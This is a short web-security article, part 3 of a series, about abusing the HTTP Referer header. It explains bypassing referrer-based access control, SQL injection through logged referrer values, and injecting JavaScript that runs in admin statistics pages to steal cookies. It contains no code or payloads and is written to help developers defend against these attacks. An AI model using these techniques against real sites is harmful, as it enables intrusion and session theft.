HTTP Header Manipulation Series

Author: David Zimmer
Site:   http://sandsprite.com/Sleuth
-----------------------------------------------------------------------------------

As article 3 in the http header manipulation series, this document introduces the
httpreferrer data field.  It is assumed that you have read the previous articles
as no real discussion will begiven explaining the logistics of http transfers.

The http referrer data field is set by thebrowser to indicate what the immediately
preceding web page was that lead the viewer to its current request.  If the viewer
simply entered the URL by hand then no referrer is sent.  Also it should be noted
that some anonymous proxies remove this data field as a privacy feature, meaning
that not all web authors will log it and that its existance cannot be explicitly
depended on in their scripts.

With that said, it is common for web authors to use this field for a variety or 
purposes ranging from a simple access control, to complex statistical data gathering
 routines.

As an access control mechanism the web developers are going on the logic that if they 
do not give you a link to a web page, then you should not be able to access it. This 
is fine for simple things like just preferring people enter your site through the main 
page and not allowing them to bookmark individual pages, but as a method of page 
security it is easily foiled. The Achilles heel of this mechanism is that it relies 
solely on user supplied data. This can be trivially bypassed by the user supplying
bogus data.

Beyond this, there is another area where the referrer field moves into a more interesting 
light. This is when a web developer uses it in his own surfer tracking/statistical routines.
Knowing where your surfers come from and who has links to your site is an attractive data
source, but it also comes with a few hidden dangers.  Again the true danger here is the 
developer assuming that this is a standard browser generated field and not viewing it as 
typical user supplied data. 

To collect statistical data the information must first be saved in some manner, and generally
with the end goal of generating reports for viewing latter on.

The first attack targets the data storage routines.  If the data was saved in a database,the
saving procedures could be subject to Sql Injection attacks if the developer did not think 
of filtering database unfriendly characters (characters which would never occur in a 
standard browser supplied referrer string). The result of such an attack could easily lead 
to data loss/or tampering, and range all the way up to arbitrary common execution on the 
server. Refer to the Sql Injection documentation for further details on its capabilities.

The second vector of attack is less direct but just as dangerous and it targets the the 
report generation phase of the statistical process.  Web developers, being the crafty sort 
that they are, will often use this same technology to generate site statistics html pages 
for viewing through their web browsers somewhere in their administration web site. What 
better language for reports and statistics than the rich context of the web environment?

If an attacker were to embed malicious JavaScript in the referrer value this content could 
easily be output raw into the generated reports. Its actions could be as simple as relaying
administration site URLS to attackers, stealing cookie values or even try to exploit browser
security holes that could lead to full access to the administrators machine!

Clearly these attacks are preventable, the trick is in knowing what to look for and 
understanding the implications of seemingly innocuous features that web developers 
often take for granted. In article 4 of this series we will look at another commonly 
accessed http data field, the User-Agent string.